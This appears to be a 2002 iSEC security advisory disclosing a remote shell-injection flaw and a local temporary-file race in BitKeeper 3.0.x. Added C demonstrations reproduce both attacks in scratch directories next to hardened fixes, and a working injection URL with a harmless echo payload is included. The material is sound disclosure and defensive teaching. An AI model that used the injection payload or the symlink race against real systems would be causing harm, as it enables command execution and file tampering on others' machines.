Maurycy Prodeus
16/01/03, 01:37
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Synopsis: BitKeeper remote shell command execution/local vulnerability
Product: BitKeeper (http://www.bitkeeper.com)
Version: 3.0.x
Author: Maurycy Prodeus <z33d@isec.pl>
Date: 11 November 2002

Issue:
- ------

BitKeeper is source management software. It contains a shell argument
handling vulnerability that lets a remote attacker run arbitrary shell
commands on a system where BitKeeper listens for HTTP requests.


Details:
- --------

1. Remote command execution

BitKeeper can be run in daemon mode, in which it opens a port and listens
for incoming requests, giving remote users access to project resources
through a web interface. To produce diffs it invokes the external diff
binary through the shell (sh -c), with the user-supplied file and revision
string embedded in that command line, so shell metacharacters in the
request are interpreted by the shell instead of being passed as data.
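The two ways of launching the external program are contrasted below in an added example; it is not BitKeeper's code. The external diff binary is stood in for by /bin/echo (an assumption, so the example runs anywhere); what matters is how the revision string reaches it. The vulnerable variant pastes the string into an sh -c command line, the hardened one passes it as a single argv element through execv(), and both are run against the URL-decoded payload from the advisory in a fresh scratch directory:

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Stand-in for the external diff binary so the example runs anywhere;
 * assumption: /bin/echo exists. Only the way 'rev' reaches it matters. */
#define EXTERNAL_TOOL "/bin/echo"

/* fork/exec argv with cwd 'dir' and stdout discarded; returns exit status. */
static int run_in_dir(const char *dir, char *const argv[]) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        int devnull = open("/dev/null", O_WRONLY);
        if (chdir(dir) != 0 || devnull < 0) _exit(127);
        dup2(devnull, STDOUT_FILENO);
        close(devnull);
        execv(argv[0], argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Vulnerable shape: the request's revision string is pasted into a command
 * line handed to sh -c. The single quotes only hold until the attacker
 * supplies one of his own. */
int diff_via_shell(const char *dir, const char *file, const char *rev) {
    char cmd[1024];
    snprintf(cmd, sizeof cmd, EXTERNAL_TOOL " '%s@%s'", file, rev);
    char *argv[] = { "/bin/sh", "-c", cmd, NULL };
    return run_in_dir(dir, argv);
}

/* Hardened shape: no shell at all. 'rev' travels as one argv element, so
 * quotes, ';' and '>' are bytes in an argument, not syntax. */
int diff_via_execv(const char *dir, const char *file, const char *rev) {
    char spec[1024];
    snprintf(spec, sizeof spec, "%s@%s", file, rev);
    char *argv[] = { EXTERNAL_TOOL, spec, NULL };
    return run_in_dir(dir, argv);
}

/* Runs one variant against the advisory's payload (URL-decoded) in a fresh
 * scratch directory and reports whether 'iwashere' appeared there. */
static int payload_creates_file(int use_shell) {
    char dir[] = "/tmp/bk-inject-XXXXXX";
    if (!mkdtemp(dir)) return -1;
    const char *rev = "';echo >iwashere'";   /* %27;echo%20%3Eiwashere%27 */
    int rc = use_shell ? diff_via_shell(dir, "foo.c", rev)
                       : diff_via_execv(dir, "foo.c", rev);
    char marker[1100];
    snprintf(marker, sizeof marker, "%s/iwashere", dir);
    struct stat st;
    int created = (rc == 0 && stat(marker, &st) == 0);
    unlink(marker);
    rmdir(dir);
    return created;
}

int shell_variant_is_injectable(void) { return payload_creates_file(1); }
int execv_variant_is_injectable(void) { return payload_creates_file(0); }

int main(void) {
    printf("sh -c : iwashere created = %d\n", shell_variant_is_injectable());
    printf("execv : iwashere created = %d\n", execv_variant_is_injectable());
    return 0;
}
```

With the shell variant the generated line is /bin/echo 'foo.c@';echo >iwashere'' and the shell runs two commands; with execv() the same bytes arrive at the tool as the literal argument foo.c@';echo >iwashere' and nothing else happens. Avoiding the shell is the fix; escaping or blacklisting metacharacters in the revision string is the fragile alternative.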

2. Locally exploitable race condition

The second vulnerability is in temporary file handling, again while
calling external programs.

Piece of strace output:

20495 getpid() = 20495
20495 lstat("/tmp/foo.c-1.1-20495", 0xbfffae9c) = -1 ENOENT (No such file or directory)
20495 lstat("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=16384, ...}) = 0
20495 open("/tmp/foo.c-1.1-20495", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 8

There is a race condition between the lstat() that checks whether the file
exists and the open() that creates it: the open() uses O_CREAT|O_TRUNC
without O_EXCL, so a symlink planted at that path in the window between the
two calls is followed and its target truncated and overwritten. The name is
predictable (file name, revision and PID), which makes winning the race
practical. Additionally the file is created with insecure permissions
(mode 0666).
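The check-then-create pattern from the strace, alongside a hardened opener, as an added example rather than BitKeeper's code. Since the attacker really acts from another process, the window between lstat() and open() is modelled by a callback that plants the symlink; that callback and the scratch directory layout are assumptions of the example. The insecure opener follows the link and truncates the victim file, while the O_EXCL|O_NOFOLLOW opener fails closed with EEXIST:

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* The pattern from the strace: lstat, then a non-exclusive create with
 * mode 0666. 'race_hook' stands for the attacker winning the window
 * between the two calls (assumption: a real attacker runs in parallel). */
int create_tmp_insecure(const char *path, void (*race_hook)(const char *)) {
    struct stat st;
    if (lstat(path, &st) == 0) return -1;        /* check ...            */
    if (race_hook) race_hook(path);              /* ... attacker acts ... */
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);   /* ... use */
}

/* Hardened: creation is the check. O_EXCL fails if anything (including a
 * dangling symlink) already exists, O_NOFOLLOW refuses symlinks, and the
 * mode is 0600. An unpredictable name via mkstemp() removes the target
 * the attacker would aim at in the first place. */
int create_tmp_secure(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Attacker's move: point the predictable name at a victim file. */
static char g_victim[1024];
static void plant_symlink(const char *path) { symlink(g_victim, path); }

/* Builds a scratch dir holding a 6-byte victim, attacks it through the
 * predictable temp name with one opener, returns the victim's final size. */
static long run_scenario(int secure) {
    char dir[] = "/tmp/bk-race-XXXXXX";
    if (!mkdtemp(dir)) return -1;
    char link[1100];
    snprintf(g_victim, sizeof g_victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/foo.c-1.1-20495", dir);  /* predictable */
    int fd = open(g_victim, O_WRONLY | O_CREAT, 0600);
    if (fd < 0 || write(fd, "secret", 6) != 6) return -1;
    close(fd);
    if (secure) {
        plant_symlink(link);             /* attacker already won */
        fd = create_tmp_secure(link);    /* -1, errno == EEXIST  */
    } else {
        fd = create_tmp_insecure(link, plant_symlink);
    }
    if (fd >= 0) close(fd);
    struct stat st;
    long size = stat(g_victim, &st) == 0 ? (long)st.st_size : -1;
    unlink(link); unlink(g_victim); rmdir(dir);
    return size;
}

/* 1 if the insecure opener truncated the victim through the symlink. */
int insecure_truncates_victim(void) { return run_scenario(0) == 0; }
/* 1 if the secure opener refused and the victim still has its 6 bytes. */
int secure_preserves_victim(void)   { return run_scenario(1) == 6; }

int main(void) {
    printf("lstat+open(0666) truncated victim: %d\n", insecure_truncates_victim());
    printf("O_EXCL|O_NOFOLLOW preserved victim: %d\n", secure_preserves_victim());
    return 0;
}
```

The lstat() in the original gives no protection: it only tells the program what was at the path a moment ago. Only an exclusive create reports the truth about the instant the file comes into existence.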

Impact:
- -------

If BitKeeper is running in daemon mode and listening for incoming requests,
a remote attacker can execute arbitrary commands on the system with the
privileges of the BitKeeper process. A local attacker can additionally gain
access to the temporary files, which may allow him to take over control of
the program.


Vendor Status:
- --------------

November 12, 2002 Vendor has been contacted
November 12, 2002 First answer
November 27, 2002 Information about pre-release
December 10, 2002 Last email

While we were coordinating the publication date of this advisory, they
stopped responding to my emails.

Exploit:
- --------

If BitKeeper is run as a stand-alone daemon, the link:

http://somehost.com:port/diffs/foo.c@%27;echo%20%3Eiwashere%27?nav=index.html|src/|hist/foo.c

should create a file named "iwashere" in the project root directory.
URL-decoded, the revision part reads ';echo >iwashere': the leading quote
closes the quoted argument in the generated command line, ';' starts a
second command, and the trailing quote rebalances the quoting so the shell
accepts the line.


- --
Maurycy Prodeus
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE+IBbnC+8U3Z5wpu4RAkM6AKDEeTh1akZ5TfdWkvw2xaHBkgXIRwCglXYQ
sjzfB4azJzMu7wJTScSllvg=
=O+nl
-----END PGP SIGNATURE-----